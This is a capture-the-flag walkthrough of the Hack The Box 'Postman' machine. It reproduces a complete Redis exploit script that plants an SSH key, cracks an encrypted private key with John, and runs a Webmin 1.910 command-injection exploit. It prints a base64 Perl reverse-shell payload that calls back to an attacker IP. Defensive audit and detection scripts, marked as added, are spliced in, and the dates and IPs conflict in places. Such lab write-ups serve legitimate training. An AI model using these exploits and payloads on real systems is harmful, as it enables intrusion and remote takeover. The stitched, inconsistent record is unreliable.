
2020-02-11

HTB::Postman Walkthrough

0x01 Target Introduction

0x02 Tools and Knowledge Used

0x03 Penetration Process

Scan all ports of the target host:

[email protected]:~$ nmap -A -Pn -T4 -p- 10.10.10.160
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-09 23:18 EST
Nmap scan report for postman.htb (10.10.10.160)
Host is up (0.34s latency).
Not shown: 65531 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: The Cyber Geek's Personal Website
6379/tcp open redis Redis key-value store 4.0.9
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-server-header: MiniServ/1.910
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The ports worth looking at are 80, 6379 and 10000.

Port 80:

Port 6379:

Port 10000:

Port 80 usually offers nothing exploitable, and trying weak passwords against the Webmin service on port 10000 got nowhere. The Redis service exposed on port 6379, however, is a good starting point: Googling "redis key store 4.0.9 exploit" turns up the exploitation method below. It only works because the instance accepts unauthenticated connections and lets any client run CONFIG SET and SAVE: the script stores an SSH public key as a value, points the snapshot directory at the redis user's .ssh directory, names the dump file authorized_keys and saves.

https://github.com/Avinash-acid/Redis-Server-Exploit

#!/usr/bin/python
#Author : Avinash Kumar Thapa aka -Acid
#Twitter : https://twitter.com/m_avinash143
#####################################################################################################################################################
# Python 2 script (print statements); run with python2 as the writeup does.

import os
import os.path
from sys import argv
from termcolor import colored


script, ip_address, username = argv


PATH='/usr/bin/redis-cli'
PATH1='/usr/local/bin/redis-cli'

def ssh_connection():
    # Log in with the key pair generated below
    shell = "ssh -i " + '$HOME/.ssh/id_rsa ' + username+"@"+ip_address
    os.system(shell)

if os.path.isfile(PATH) or os.path.isfile(PATH1):
    try:
        print colored('\t*******************************************************************', "green")
        print colored('\t* [+] [Exploit] Exploiting misconfigured REDIS SERVER*' ,"green")
        print colored('\t* [+] AVINASH KUMAR THAPA aka "-Acid" ', "green")
        print colored('\t*******************************************************************', "green")
        print "\n"
        print colored("\t SSH Keys Need to be Generated", 'blue')
        os.system('ssh-keygen -t rsa -C \"acid_creative\"')
        print colored("\t Keys Generated Successfully", "blue")
        # Pad the public key with newlines so it survives inside the RDB dump
        os.system("(echo '\r\n\'; cat $HOME/.ssh/id_rsa.pub; echo \'\r\n\') > $HOME/.ssh/public_key.txt")
        cmd = "redis-cli -h " + ip_address + ' flushall'
        cmd1 = "redis-cli -h " + ip_address
        os.system(cmd)
        cmd2 = "cat $HOME/.ssh/public_key.txt | redis-cli -h " + ip_address + ' -x set cracklist'
        os.system(cmd2)
        # Redirect the snapshot into the target user's .ssh directory and name it authorized_keys
        cmd3 = cmd1 + ' config set dbfilename "backup.db" '
        cmd4 = cmd1 + ' config set dir' + " /usr/lib/"+username+"/.ssh/"
        cmd5 = cmd1 + ' config set dbfilename "authorized_keys" '
        cmd6 = cmd1 + ' save'
        os.system(cmd3)
        os.system(cmd4)
        os.system(cmd5)
        os.system(cmd6)
        print colored("\tYou'll get shell in sometime..Thanks for your patience", "green")
        ssh_connection()

    except:
        print "Something went wrong"
else:
    print colored("\tRedis-cli:::::This utility is not present on your system. You need to install it to proceed further.", "red")

Run python2 exp.py 10.10.10.160 redis and SSH into the target. Note the "ERR Changing directory" line in the output: the script hard-codes /usr/lib/redis/.ssh/, while pwd afterwards shows the redis home is actually /var/lib/redis.

[email protected]:~/Desktop/HTB Scripts/Redis$ python2 exp.py 10.10.10.160 redis
*******************************************************************
* [+] [Exploit] Exploiting misconfigured REDIS SERVER*
* [+] AVINASH KUMAR THAPA aka "-Acid"
*******************************************************************


SSH Keys Need to be Generated
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kali/.ssh/id_rsa.
Your public key has been saved in /home/kali/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:wMzHMZr3ew4dVP3cXrwsWg7JF7ay4peQHLplhK7BDww acid_creative
The key's randomart image is:
+---[RSA 3072]----+
| o .. |
| + + o . .|
| B = . oo|
| E = + . o *|
| + . S = + +.o|
| = o * B * o.|
| = + + % . |
| . o . O . |
| ..o . |
+----[SHA256]-----+
Keys Generated Successfully
OK
OK
OK
(error) ERR Changing directory: No such file or directory
OK
OK
You'll get shell in sometime..Thanks for your patience
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon Feb 10 08:46:56 2020 from 10.10.15.125
[email protected]:~$ pwd
/var/lib/redis
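The only reason the step above works is a Redis instance reachable from the network with no authentication and CONFIG/SAVE left enabled. The following audit script is an added example (not part of the writeup or the exploit repository); it parses a redis.conf and reports the settings that enable this attack, using two constructed configs, one exposed and one hardened. The directive names are real Redis configuration keys; the sample values are made up.

```python
#!/usr/bin/env python3
"""Audit a redis.conf for the settings that let an unauthenticated client
rewrite the snapshot location (added example; sample configs are constructed)."""
import re

# Constructed sample: what an exposed Redis 4.x instance typically looks like.
SAMPLE_CONF = """\
# redis.conf (constructed sample)
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
dbfilename dump.rdb
"""

# Constructed sample: the same instance with the usual hardening applied.
HARDENED_CONF = """\
bind 127.0.0.1
protected-mode yes
port 6379
requirepass REPLACE_WITH_LONG_RANDOM_SECRET
rename-command CONFIG ""
rename-command FLUSHALL ""
dir /var/lib/redis
dbfilename dump.rdb
"""


def parse_conf(text):
    """Return {directive: [value, ...]}; repeated directives (rename-command) are kept."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        val = parts[1].strip() if len(parts) > 1 else ""
        conf.setdefault(key, []).append(val)
    return conf


def renamed_or_disabled(conf, command):
    """True if 'rename-command COMMAND <new-name or "">' is present for COMMAND."""
    for val in conf.get("rename-command", []):
        m = re.match(r'(\S+)\s+("?)(.*?)\2$', val)
        if m and m.group(1).upper() == command:
            return True
    return False


def audit(text):
    """Return a list of findings; an empty list means this check found nothing."""
    conf = parse_conf(text)
    findings = []
    # Without a bind directive Redis listens on every interface.
    binds = conf.get("bind", ["0.0.0.0"])[-1].split()
    if any(b in ("0.0.0.0", "::", "*") for b in binds):
        findings.append("bind: listening on all interfaces")
    if conf.get("protected-mode", ["yes"])[-1].lower() == "no":
        findings.append("protected-mode: disabled")
    if "requirepass" not in conf:
        findings.append("requirepass: no authentication configured")
    for cmd in ("CONFIG", "FLUSHALL"):
        if not renamed_or_disabled(conf, cmd):
            findings.append("%s: command not renamed or disabled" % cmd)
    dbfile = conf.get("dbfilename", ["dump.rdb"])[-1]
    if not dbfile.endswith(".rdb"):
        findings.append("dbfilename: unexpected snapshot name %r" % dbfile)
    return findings


if __name__ == "__main__":
    for name, text in (("exposed", SAMPLE_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit(text) or ["no findings"])
```

Point the script at a real /etc/redis/redis.conf by reading the file into audit(); the dbfilename check is there because a running instance that has been tampered with the way the script above does will show a non-.rdb name when you dump its live config with CONFIG GET.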

Looking at /etc/passwd and the /home directory shows a user named Matt, and user.txt is owned by Matt, so the next step is to escalate to that user. Under /opt there is an id_rsa.bak file:

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
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-----END RSA PRIVATE KEY-----

LinEnum.sh can also be used to look for sensitive files like this one:

Convert the key into a file John can read with ssh2john.py:

[email protected]:~/Desktop$ /usr/share/john/ssh2john.py id_rsa > id_rsa.hash

Then crack the passphrase of the RSA key with John:

[email protected]:~/Desktop$ /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008 (id_rsa)
1g 0:00:00:35 DONE (2020-02-10 04:28) 0.02844g/s 408014p/s 408014c/s 408014C/sa6_123..*7¡Vamos!
Session completed
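John's "Cost 1 ... is 1" and "Cost 2 (iteration count) is 2" lines say why this key fell in 35 seconds: it is a legacy PEM key whose passphrase is turned into a 3DES key by a single MD5 pass, so candidates can be tested at hundreds of thousands per second. The script below is an added example (not from the writeup); it classifies an SSH private key from its headers, recognising both the legacy PEM form seen in id_rsa.bak and the newer openssh-key-v1 container, whose cipher and KDF names are stored as length-prefixed strings at the start of the blob. The key texts are constructed stand-ins with placeholder bodies, not real keys.

```python
#!/usr/bin/env python3
"""Classify how an SSH private key is protected from its headers alone
(added example; the key texts below are constructed, not real keys)."""
import base64
import re

# Constructed sample: legacy PEM, encrypted with 3DES via the single-MD5 KDF.
LEGACY_PEM_3DES = """\
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,0011223344556677

QUJDREVGR0g=
-----END RSA PRIVATE KEY-----
"""

# Constructed sample: legacy PEM with no passphrase at all.
LEGACY_PEM_PLAIN = """\
-----BEGIN RSA PRIVATE KEY-----
QUJDREVGR0g=
-----END RSA PRIVATE KEY-----
"""

MAGIC = b"openssh-key-v1\x00"


def openssh_key(cipher, kdf):
    """Build a minimal openssh-key-v1 blob carrying the given cipher/KDF names
    (header only; enough for classify(), not a usable key)."""
    def s(b):
        return len(b).to_bytes(4, "big") + b
    blob = MAGIC + s(cipher.encode()) + s(kdf.encode()) + s(b"")  # kdfoptions empty
    body = base64.b64encode(blob).decode()
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n%s\n"
            "-----END OPENSSH PRIVATE KEY-----\n" % body)


def classify(text):
    """Return (format, cipher, kdf) describing how the key file is protected."""
    if "BEGIN OPENSSH PRIVATE KEY" in text:
        b64 = "".join(l for l in text.splitlines() if not l.startswith("-----"))
        blob = base64.b64decode(b64)
        if not blob.startswith(MAGIC):
            raise ValueError("not an openssh-key-v1 blob")
        pos = len(MAGIC)
        fields = []
        for _ in range(2):  # ciphername, kdfname
            n = int.from_bytes(blob[pos:pos + 4], "big")
            pos += 4
            fields.append(blob[pos:pos + n].decode())
            pos += n
        cipher, kdf = fields
        return ("openssh-v1", cipher, kdf)
    m = re.search(r"^DEK-Info:\s*([A-Z0-9-]+),", text, re.M)
    if m:
        # Legacy PEM derives the cipher key from the passphrase with one MD5 round.
        return ("legacy-pem", m.group(1), "md5")
    return ("legacy-pem", "none", "none")


def risk(text):
    """One-line assessment of how much a stolen copy of this key is worth."""
    fmt, cipher, kdf = classify(text)
    if cipher == "none":
        return "unencrypted: anyone who reads the file owns the key"
    if kdf == "md5":
        return "weak: legacy PEM, single-MD5 KDF, passphrase is cheap to brute force"
    if kdf == "bcrypt":
        return "ok: bcrypt KDF, brute-force cost scales with the -a rounds chosen"
    return "unknown KDF %s" % kdf


if __name__ == "__main__":
    for label, key in (("id_rsa.bak style", LEGACY_PEM_3DES),
                       ("no passphrase", LEGACY_PEM_PLAIN),
                       ("modern", openssh_key("aes256-ctr", "bcrypt"))):
        print("%-16s %s" % (label, risk(key)))
```

A key that classifies as legacy-pem/md5 can be re-wrapped in place with ssh-keygen -p -o -a 100 -f id_rsa, which keeps the key material but switches to the openssh-key-v1 container with a bcrypt KDF; the more fundamental fix on this box is not leaving a backup of a private key readable in /opt.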

Switch to the Matt user and read user.txt:

[email protected]:~$ su Matt
Password:
[email protected]:/var/lib/redis$ cd /home/Matt/
[email protected]:~$ cat user.txt
517ad0ec2458ca97af8d93aac08a2f3c

The id_rsa private key cannot be used to log in to the target here; every successful login is immediately followed by a Connection closed.

Listing the processes running as root with the lse.sh script shows the Webmin on port 10000 again, and Matt / computer2008 logs in to it successfully. Googling "webmin exploit", exploit-db has the following:

https://www.exploit-db.com/exploits/46984

Metasploit also has a module for this vulnerability.

Module options (exploit/linux/http/webmin_packageup_rce):

Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD computer2008 yes Webmin Password
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.10.160 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 10000 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path for Webmin application
USERNAME Matt yes Webmin Username
VHOST no HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.4 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Webmin <= 1.910

msf5 exploit(linux/http/webmin_packageup_rce) > exploit

[*] Started reverse TCP handler on 10.10.14.113:4444
[+] Session cookie: ba61f4eadcffcce039b166a29defa004
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.14.113:4444 -> 10.10.10.160:46990) at
2019-12-24 17:43:52 -0500
cat /root/root.txt

a257741[-----------------]ddce

A quick look at the payload shows that Webmin's package-update handling is vulnerable to command injection: the package name parameter is passed to a shell, so an extra user-supplied command gets executed. The payload can also be sent directly with Burp Suite:

POST /package-updates/update.cgi HTTP/1.1
Host: [RHOST]:[RPORT]
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: sid=[INPUT GOOD SID HERE]
Referer: [RHOST]:[RPORT]/package-updates/?xnavigation=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 432
Connection: close

u=acl%2Fapt&u=[PAYLOAD HERE]

--------------------------------------------------------
POC Payload Info
URL decoded
| bash -c "{echo,cGVybCAtTUlPIC1lICckcD1mb3JrO2V4aXQsaWYoJHApO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxMC4xMC4xNC4yMjI6NDQ0NCIpO1NURElOLT5mZG9wZW4oJGMscik7JH4tPmZkb3BlbigkYyx3KTt3aGlsZSg8Pil7aWYoJF89fiAvKC4qKS8pe3N5c3RlbSAkMTt9fTsn}|{base64,-d}|{bash,-i}"

base64 decoded
perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"10.10.14.222:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'

all together decoded
| bash -c "{echo,perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"10.10.14.222:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'}|{base64,-d}|{bash,-i}"
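The request above is easy to spot from the server side: a legitimate package name never contains a pipe, a semicolon, command substitution or the {echo,...}|{base64,-d} brace groups the payload uses to avoid spaces. The following detection routine is an added example (not from the writeup or the exploit-db entry); it URL-decodes every u value of a POST to /package-updates/update.cgi and flags the ones carrying shell metacharacters, run over a few constructed request bodies.

```python
#!/usr/bin/env python3
"""Flag Webmin package-updates requests whose 'u' parameter carries shell
metacharacters (added detection example; the request bodies are constructed)."""
import re
from urllib.parse import parse_qs

# Shell metacharacters a package name never needs, plus brace groups of the
# {word,word} form used to write commands without spaces.
SUSPICIOUS = re.compile(r"[|;&`$]|\{[^}]*,[^}]*\}|\n")

# Constructed sample requests: (label, request path, urlencoded body)
REQUESTS = [
    ("benign", "/package-updates/update.cgi", "u=acl%2Fapt&mode=new&search=1"),
    ("injected", "/package-updates/update.cgi", "u=acl%2Fapt&u=%7C%20id"),
    ("injected-braces", "/package-updates/update.cgi",
     "u=%7Cbash+-c+%22%7Becho%2Cx%7D%7C%7Bbase64%2C-d%7D%22"),
    ("other-cgi", "/index.cgi", "u=acl%2Fapt"),
]


def inspect(path, body):
    """Return the decoded 'u' values that look like injection attempts.
    Only update.cgi is checked; anything else returns an empty list."""
    if not path.endswith("/package-updates/update.cgi"):
        return []
    values = parse_qs(body, keep_blank_values=True).get("u", [])
    return [v for v in values if SUSPICIOUS.search(v)]


def scan(requests):
    """Map request label -> offending values, for every request that triggers."""
    hits = {}
    for label, path, body in requests:
        bad = inspect(path, body)
        if bad:
            hits[label] = bad
    return hits


if __name__ == "__main__":
    for label, bad in scan(REQUESTS).items():
        print("%-16s %r" % (label, bad))
```

In practice the body is not in a default Apache-style access log, so this belongs in a WAF rule or on a request-logging proxy in front of MiniServ; the cheaper mitigation on this box is simply not exposing Webmin 1.910 to the network and patching it.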

0x04 Summary

"Postman" is a Linux-based box. The first step abuses the Redis server, which lets an attacker write their own SSH public key onto the server, gaining unauthorized access to the system and discovering an encrypted SSH key belonging to the user Matt. That encrypted key is then cracked with JohnTheRipper to recover its passphrase. Next, the Webmin portal on port 10000 is used to log in as Matt and reach the Webmin panel. Finally, a search for an exploit matching the Webmin version number leads to a successful Metasploit exploitation and a root shell.

0x05 Reference

[https://github.com/Dog9w23/Webmin-1.910-Exploit/blob/master/Webmin 1.910 - Remote Code Execution using BurpSuite](https://github.com/Dog9w23/Webmin-1.910-Exploit/blob/master/Webmin 1.910 - Remote Code Execution using BurpSuite)

https://blog.csdn.net/test1988x/article/details/103921210

https://www.soeren.codes/2019/12/24/postbox-writeup/

Copyright © ca01h 2019-2020